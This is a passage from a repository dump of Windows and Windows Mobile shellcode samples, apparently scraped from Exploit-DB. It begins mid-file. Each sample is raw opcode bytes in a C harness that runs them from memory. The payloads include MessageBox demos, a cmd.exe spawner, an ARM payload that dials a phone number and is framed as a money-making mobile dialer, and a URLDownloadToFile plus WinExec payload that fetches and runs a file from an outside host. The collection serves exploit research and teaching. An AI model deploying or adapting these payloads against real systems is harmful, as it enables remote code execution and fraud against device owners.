"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24" 39 | "\x40\xFF\x54\x24\x40\x57\xFF\xD0"; 40 | 41 | printf("Size = %d\n", strlen(shellcode)); 42 | 43 | system("PAUSE"); 44 | 45 | ((void (*)())shellcode)(); 46 | 47 | 
return 0; 48 | } -------------------------------------------------------------------------------- /Windows/Windows_-_MessageBox_Null-Free_Shellcode__113_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | User32-free Messagebox Shellcode for any Windows version 3 | ======================================================== 4 | 5 | Title: User32-free Messagebox Shellcode for any Windows version 6 | Release date: 16/10/2013 7 | Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b) 8 | Size: 113 byte (NULL free) 9 | Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3 10 | */ 11 | 12 | 13 | char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" 14 | "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" 15 | "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" 16 | "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" 17 | "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" 18 | "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" 19 | "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" 20 | "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; 21 | 22 | 23 | int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();} -------------------------------------------------------------------------------- /Windows/Windows_-_URLDownloadToFile__http:__bflow_security-portal_cz_down_xy_txt__+_WinExec_+_ExitProcess_Shellcode__Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode 3 | Date: 2013-22-01 4 | Author: RubberDuck 5 | Web: http://bflow.security-portal.cz 6 | http://www.security-portal.cz 7 | Tested on: Win 2k, Win XP Home SP2/SP3 CZ (32), Win 7 (32/64) 8 | -- file is downloaded from URL 
http://bflow.security-portal.cz/down/xy.txt 9 | -- xy.txt - http://www.virustotal.com/file/7d0d68f8e378d5aa29620c749f797d1d5fa05356fbf6f9ca64ba00f00fe86182/analysis/1358866648/ 10 | -- xy.txt only shows MessageBox with text "Test application for Allwin URLDownloadToFile shellcode" 11 | and title ">> Author: RubberDuck - http://bflow.security-portal.cz <<" 12 | 13 | */ 14 | 15 | #include 16 | #include 17 | 18 | int main(){ 19 | unsigned char shellcode[] = 20 | "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B" 21 | "\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53" 22 | "\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72" 23 | "\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81" 24 | "\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04" 25 | "\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64" 26 | "\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3" 27 | "\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3" 28 | "\x8B\x14\x8E\x03\xD3\x33\xC9\x51\x68\x2E" 29 | "\x65\x78\x65\x68\x64\x65\x61\x64\x53\x52" 30 | "\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62" 31 | "\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2" 32 | "\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C" 33 | "\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C" 34 | "\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24" 35 | "\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33" 36 | "\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64" 37 | "\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C" 38 | "\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24" 39 | "\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83" 40 | "\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68" 41 | "\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57" 42 | "\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D" 43 | "\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A" 44 | "\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03" 45 | "\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69" 46 | "\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF" 47 | "\xFF\xFF" 48 | // http://bflow.security-portal.cz/down/xy.txt 49 | "\x68\x74\x74\x70\x3A\x2F\x2F\x62" 50 | "\x66\x6C\x6F\x77\x2E\x73\x65\x63\x75\x72" 51 | "\x69\x74\x79\x2D\x70\x6F\x72\x74\x61\x6C" 52 | 
"\x2E\x63\x7A\x2F\x64\x6F\x77\x6E\x2F\x78" 53 | "\x79\x2E\x74\x78\x74\x00"; 54 | 55 | LPVOID lpAlloc = NULL; 56 | void (*pfunc)(); 57 | 58 | lpAlloc = VirtualAlloc(0, 4096, 59 | MEM_COMMIT, 60 | PAGE_EXECUTE_READWRITE); 61 | 62 | if(lpAlloc == NULL){ 63 | printf("Memory isn't allocated!\n"); 64 | return 0; 65 | } 66 | 67 | memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1); 68 | 69 | pfunc = (void (*)())lpAlloc; 70 | 71 | pfunc(); 72 | 73 | return 0; 74 | } -------------------------------------------------------------------------------- /Windows/Windows_-_cmd_exe_+_ExitProcess_WinExec_Shellcode__195_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes 3 | Date: 2010-06-25 4 | Author: RubberDuck 5 | Web: http://bflow.security-portal.cz 6 | Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32) 7 | Thanks to: kernelhunter, Lodus, Vrtule and others 8 | */ 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | int main(){ 15 | unsigned char shellcode[]= 16 | "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" 17 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" 18 | "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" 19 | "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" 20 | "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" 21 | "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" 22 | "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" 23 | "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" 24 | "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" 25 | "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" 26 | "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" 27 | "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" 28 | "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" 29 | "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" 30 | "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" 31 | "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" 32 | 
"\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" 33 | "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" 34 | "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" 35 | "\x24\x20\x57\xFF\xD0"; 36 | 37 | printf("Size = %d\n", strlen(shellcode)); 38 | 39 | system("PAUSE"); 40 | 41 | ((void (*)())shellcode)(); 42 | 43 | return 0; 44 | } -------------------------------------------------------------------------------- /Windows/Windows_Mobile_6_5_TR_-_Phone_Call_Shellcode__Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | Title: Windows Mobile 6.5 TR Phone Call Shellcode 2 | Author: Celil Ünüver 3 | /* 4 | 5 | Device: HTC Touch2 6 | System: Windows Mobile 6.5 TR (WinCE 5.0.2) 7 | 8 | Coded by Celil ‹n¸ver from SecurityArchitect 9 | 10 | Contact: 11 | celilunuver[n*spam]gmail.com 12 | www.securityarchitect.org 13 | blog.securityarchitect.org 14 | 15 | 16 | Notes: thats a PhoneCall Shellcode! Do you remember the time of dialers? Dial-up Modem times? ;) 17 | 18 | now is it the time of mobile dialers and malwares to make $$ ? 
:) 19 | 20 | 21 | EXPORT start 22 | AREA .text, CODE 23 | start 24 | ldr R12, =0x3f6272c 25 | adr r0, lib 26 | mov lr, pc 27 | mov pc, r12 28 | ldr r12, =0x2e806dc 29 | adr r0, num 30 | mov r3, #0 31 | mov r2, #0 32 | mov r1, #0 33 | mov lr, pc 34 | mov pc, r12 35 | 36 | lib dcb "c",0,"e",0,"l",0,"l",0,"c",0,"o",0,"r",0,"e",0,0,0,0,0 37 | num dcb "3",0,"1",0,"3",0,"3",0,"7",0,0,0 38 | ALIGN 39 | 40 | END 41 | 42 | dumpbin /disasm: 43 | 44 | 00011000: E59FC044 ldr r12, [pc, #0x44] 45 | 00011004: E28F0020 add r0, pc, #0x20 46 | 00011008: E1A0E00F mov lr, pc 47 | 0001100C: E1A0F00C mov pc, r12 48 | 00011010: E59FC038 ldr r12, [pc, #0x38] 49 | 00011014: E28F0024 add r0, pc, #0x24 50 | 00011018: E3A03000 mov r3, #0 51 | 0001101C: E3A02000 mov r2, #0 52 | 00011020: E3A01000 mov r1, #0 53 | 00011024: E1A0E00F mov lr, pc 54 | 00011028: E1A0F00C mov pc, r12 55 | 0001102C: 00650063 rsbeq r0, r5, r3, rrx 56 | 00011030: 006C006C rsbeq r0, r12, r12, rrx 57 | 00011034: 006F0063 rsbeq r0, pc, r3, rrx 58 | 00011038: 00650072 rsbeq r0, r5, r2, ror r0 59 | 0001103C: 00000000 andeq r0, r0, r0 60 | 00011040: 00310033 eoreqs r0, r1, r3, lsr r0 61 | 00011044: 00330033 eoreqs r0, r3, r3, lsr r0 62 | 00011048: 00000037 andeq r0, r0, r7, lsr r0 63 | 0001104C: 03F6272C 64 | 00011050: 02E806DC rsceq r0, r8, #0xDC, 12 65 | 66 | 67 | "i don't think we have any imperfections; we perfectly are what we are." 
68 | 69 | */ 70 | 71 | #include 72 | #include 73 | 74 | int shellcode[] = 75 | { 76 | 0xE59FC044, 77 | 0xE28F0020, 78 | 0xE1A0E00F, 79 | 0xE1A0F00C, 80 | 0xE59FC038, 81 | 0xE28F0024, 82 | 0xE3A03000, 83 | 0xE3A02000, 84 | 0xE3A01000, 85 | 0xE1A0E00F, 86 | 0xE1A0F00C, 87 | 0x00650063, 88 | 0x006C006C, 89 | 0x006F0063, 90 | 0x00650072, 91 | 0x00000000, 92 | 0x00310033, 93 | 0x00330033, 94 | 0x00000037, 95 | 0x03F6272C, 96 | 0x02E806DC, 97 | }; 98 | 99 | int WINAPI WinMain( HINSTANCE hInstance, 100 | HINSTANCE hPrevInstance, 101 | LPTSTR lpCmdLine, 102 | int nCmdShow) 103 | { 104 | ((void (*)(void)) & shellcode)(); 105 | 106 | return 0; 107 | } -------------------------------------------------------------------------------- /Windows/Windows_Mobile_6_5_TR__WinCE_5_2__-_MessageBox_Shellcode__ARM___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Device: HTC Touch2 4 | System: Windows Mobile 6.5 TR (WinCE 5.0.2) 5 | 6 | Addresses of functions can be different on different devices, so you can edit the function addresses. 
7 | 8 | Coded by Celil Ünüver from SecurityArchitect 9 | 10 | Contact: 11 | celilunuver[n*spam]gmail.com 12 | www.securityarchitect.org 13 | blog.securityarchitect.org 14 | 15 | EXPORT start 16 | AREA .text, CODE 17 | start 18 | eor r0, r0, r0 19 | eor r1, r1, r1 20 | eor r2, r2, r2 21 | eor r3, r3, r3 22 | ldr R12, =0x3f6272c ; LoadLibrary Address 23 | adr r0, lib ; library name {coredll.dll} 24 | mov lr, pc 25 | mov pc, r12 26 | ldr r12, =0x3f7c15c ; MessageBox Address 27 | mov r0, #0 28 | adr r1, mes 29 | adr r2, mes 30 | mov R3, #0 31 | mov lr, pc 32 | mov pc, r12 33 | 34 | lib dcb "c",0,"o",0,"r",0,"e",0,"d",0,"l",0,"l",0,".",0,"d",0,"l",0,"l",0,0,0 35 | mes dcb "o",0,"w",0,"n",0,"z",0,0,0 36 | ALIGN 37 | END 38 | */ 39 | 40 | #include 41 | #include 42 | 43 | int shellcode[] = 44 | { 45 | 0xE0200000, 46 | 0xE0211001, 47 | 0xE0222002, 48 | 0xE0233003, 49 | 0xE59FC048, 50 | 0xE28F0020, 51 | 0xE1A0E00F, 52 | 0xE1A0F00C, 53 | 0xE59FC03C, 54 | 0xE3A00000, 55 | 0xE28F1024, 56 | 0xE28F2020, 57 | 0xE3A03000, 58 | 0xE1A0E00F, 59 | 0xE1A0F00C, 60 | 0x006F0063, 61 | 0x00650072, 62 | 0x006C0064, 63 | 0x002E006C, 64 | 0x006C0064, 65 | 0x0000006C, 66 | 0x0077006F, 67 | 0x007A006E, 68 | 0x00000000, 69 | 0x03F6272C, 70 | 0x03F7C15C, 71 | }; 72 | 73 | int WINAPI WinMain( HINSTANCE hInstance, 74 | HINSTANCE hPrevInstance, 75 | LPTSTR lpCmdLine, 76 | int nCmdShow) 77 | { 78 | ((void (*)(void)) & shellcode)(); 79 | 80 | return 0; 81 | } -------------------------------------------------------------------------------- /Windows/Windows_XP_Professional_SP2__English__-_MessageBox_Null-Free_Shellcode__16_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | +-----------------------------------------------------+ 2 | | Windows XP Pro Sp2 English "Message-Box" Shellcode. | 3 | +-----------------------------------------------------+ 4 | 5 | Size : 16 Bytes, Null-Free. 6 | Author : Aodrulez. 
7 | Email : f3arm3d3ar@gmail.com 8 | 9 | 10 | 11 | Shellcode = "\xB9\x78\x68\x82\x7C\x33\xC0\xBB" 12 | "\xF8\x0C\x86\x7C\x51\x50\xFF\xD3" 13 | 14 | 15 | 16 | 17 | +--------------+ 18 | | Description: | 19 | +--------------+ 20 | 21 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 22 | I've used a Function called "FatalAppExit". 23 | The Benefits are Three-Fold! 24 | 25 | 1] Displays a MessageBox. 26 | 2] Terminates the Process. 27 | 3] Its there in Kernel32.dll itself. 28 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 29 | 30 | 31 | 32 | 33 | 34 | +-----------+ 35 | | Asm Code: | 36 | +-----------+ 37 | 38 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 39 | shellcode: 40 | mov ecx,7c826878h ;"Admin" string in mem 41 | xor eax,eax 42 | mov ebx,7c860cf8h ;Addr of "FatalAppExit()" 43 | push ecx ;function from Kernel32 44 | push eax 45 | call ebx ;App does a Clean Exit. 46 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 47 | 48 | 49 | 50 | 51 | 52 | 53 | +-----------------+ 54 | | Shellcodetest.c | 55 | +-----------------+ 56 | 57 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 58 | 59 | char code[] = "\xB9\x78\x68\x82\x7C\x33\xC0\xBB" 60 | "\xF8\x0C\x86\x7C\x51\x50\xFF\xD3"; 61 | 62 | 63 | 64 | 65 | int main(int argc, char **argv) 66 | { 67 | 68 | int (*func)(); 69 | func = (int (*)()) code; 70 | (int)(*func)(); 71 | } 72 | 73 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 74 | 75 | 76 | 77 | +-------------------+ 78 | | Greetz Fly Out To | 79 | +-------------------+ 80 | 81 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 82 | 1] Amforked() : My Mentor. 83 | 2] The Blue Genius : My Boss. 84 | 3] www.orchidseven.com 85 | 4] str0ke 86 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 87 | 88 | +---------------------------------------------+ 89 | | Forgive, O Lord, My Little Jokes on Thee, | 90 | | and I'll Forgive Thy Great Big Joke on Me. 
| 91 | +---------------------------------------------+ -------------------------------------------------------------------------------- /Windows/Windows_XP_Professional_SP2__English__-_Wordpad_Null-Free_Shellcode__12_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | +-------------------------------------------------+ 2 | | Windows XP Pro Sp2 English "Wordpad" Shellcode. | 3 | +-------------------------------------------------+ 4 | 5 | Size : 12 Bytes,Null Free. 6 | Author : Aodrulez. 7 | Email : f3arm3d3ar@gmail.com 8 | Milw0rm : www.milw0rm.com/author/1620 9 | 10 | Shellcode = "\x68\x87\x4c\x80\x7c\xb8" 11 | "\x6d\x13\x86\x7c\xff\xd0" 12 | 13 | +-----------------+ 14 | | Shellcodetest.c | 15 | +-----------------+ 16 | 17 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 18 | char code[] = "\x68\x87\x4c\x80\x7c\xb8" 19 | "\x6d\x13\x86\x7c\xff\xd0"; 20 | 21 | 22 | int main(int argc, char **argv) 23 | { 24 | 25 | int (*func)(); 26 | func = (int (*)()) code; 27 | (int)(*func)(); 28 | } 29 | 30 | 31 | 32 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 33 | 34 | +-------------------+ 35 | | Greetz Fly Out To | 36 | +-------------------+ 37 | 38 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 39 | 1] Amforked() : My Mentor. 40 | 2] The Blue Genius : My Boss. 41 | 3] www.orchidseven.com 42 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -------------------------------------------------------------------------------- /Windows/Windows_XP_SP2_-_PEB_ISbeingdebugged_Beep_Shellcode__56_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #name: win xp sp2 PEB ISbeingdebugged shellcode 2 | 3 | #Author: Anonymous 4 | 5 | #Date: 14.12.2009. 
6 | 7 | here is the ASM code made using masm32 8 | 9 | 10 | if program is being run under debugger the shellcode wil start beeping :D 11 | //////////////////////begin/////////////////////////////////////// 12 | 13 | .386 14 | .model flat, stdcall 15 | option casemap :none 16 | INCLUDE C:\MASM32\INCLUDE\WINDOWS.INC 17 | INCLUDE C:\MASM32\INCLUDE\KERNEL32.INC 18 | INCLUDE C:\MASM32\INCLUDE\USER32.INC 19 | INCLUDE C:\MASM32\INCLUDE\MASM32.INC 20 | INCLUDELIB C:\MASM32\LIB\KERNEL32.LIB 21 | INCLUDELIB C:\MASM32\LIB\USER32.LIB 22 | INCLUDELIB C:\MASM32\LIB\MASM32.LIB 23 | 24 | 25 | .data 26 | ExitMsg DB "Enter to Exit", 0 27 | 28 | .code 29 | start: 30 | assume fs:nothing 31 | mov eax,fs:[30h] 32 | mov eax, [eax+02h] 33 | mov ebx, 7FFF8000h 34 | add ebx,7FFF8000h 35 | inc ebx 36 | push 300h 37 | push 200h 38 | mov edx,7c837a8fh 39 | cmp eax,ebx 40 | jnz exit 41 | call edx 42 | exit: 43 | invoke ExitProcess,NULL 44 | 45 | 46 | end start 47 | 48 | 49 | /////////////////////////////end/////////////////////////////// 50 | 51 | here is the dump of code using olly debugger 52 | 53 | 54 | 00401000 >/$ 64:A1 30000000 MOV EAX,DWORD PTR FS:[30] 55 | 00401006 |. 8B40 02 MOV EAX,DWORD PTR DS:[EAX+2] 56 | 00401009 |. BB 0080FF7F MOV EBX,7FFF8000 57 | 0040100E |. 81C3 0080FF7F ADD EBX,7FFF8000 58 | 00401014 |. 43 INC EBX 59 | 00401015 |. 68 00030000 PUSH 300 ; /Duration = 768. ms 60 | 0040101A |. 68 00020000 PUSH 200 ; |Frequency = 200 (512.) 61 | 0040101F |. BA 8F7A837C MOV EDX,kernel32.Beep ; | 62 | 00401024 |. 3BC3 CMP EAX,EBX ; | 63 | 00401026 |. 75 02 JNZ SHORT antidebu.0040102A ; | 64 | 00401028 |. FFD2 CALL EDX ; \Beep 65 | 0040102A |> 6A 00 PUSH 0 ; /ExitCode = 0 66 | 0040102C \. 
E8 01000000 CALL ; \ExitProcess 67 | 00401031 CC INT3 68 | 00401032 .-FF25 00204000 JMP DWORD PTR DS:[<&kernel32.ExitProcess>; kernel32.ExitProcess 69 | 70 | 71 | 72 | 73 | 74 | 75 | here is the shellcode 76 | \x64\xA1\x30\x00\x00\x00\x8B\x40\x02\xBB\x00\x80\xFF\x7F\x81\xC3\x00\x80\xFF\x7F\x43\x68\x00\x03\x00\x00\x68\x00\x02\x00\x00\xBA\x8F\x7A\x83\x7C\x3B\xC3\x75\x02\xFF\xD2\x6A\x00\xE8\x01\x00\x00\x00\xCC\xFF\x25\x00\x20\x40\x00 -------------------------------------------------------------------------------- /Windows/Windows_XP_SP3__English__-_MessageBoxA_Shellcode__87_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Windows XP SP3 English MessageBoxA Shellcode (87 bytes) 3 | Date: August 20, 2010 4 | Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) 5 | Tested on: Windows XP SP3 En 6 | Thanks: ishtus 7 | Greetz: Astalavista, OffSEC, Exploit-DB 8 | 9 | Exploit-DB Notes: 10 | Tested under Windows XP SP3 Eng 11 | The correct memory address for GetProcAddress() appears to be different on our test machine, 12 | which is 0x7c80ae30. 
13 | */ 14 | 15 | #include 16 | 17 | char shellcode[] = 18 | "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" 19 | "\x51\x68\x6c\x6c\x20\x20\x68\x33" 20 | "\x32\x2e\x64\x68\x75\x73\x65\x72" 21 | "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" // 0x7c801d7b ; LoadLibraryA(user32.dll) 22 | "\xff\xd3\xb9\x5e\x67\x30\xef\x81" 23 | "\xc1\x11\x11\x11\x11\x51\x68\x61" 24 | "\x67\x65\x42\x68\x4d\x65\x73\x73" 25 | "\x89\xe1\x51\x50\xbb\x40\xae\x80" // 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA) 26 | "\x7c\xff\xd3\x89\xe1\x31\xd2\x52" 27 | "\x51\x51\x52\xff\xd0\x31\xc0\x50" 28 | "\xb8\x12\xcb\x81\x7c\xff\xd0"; // 0x7c81cb12 ; ExitProcess(0) 29 | 30 | int main(int argc, char **argv) 31 | { 32 | int (*func)(); 33 | func = (int (*)()) shellcode; 34 | printf("Shellcode Length is : %d",strlen(shellcode)); 35 | (int)(*func)(); 36 | 37 | } -------------------------------------------------------------------------------- /getItem.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/ShellcodeSpider/55cf38010b85151ddb4ad10edd2f278ec737ec33/getItem.pyc --------------------------------------------------------------------------------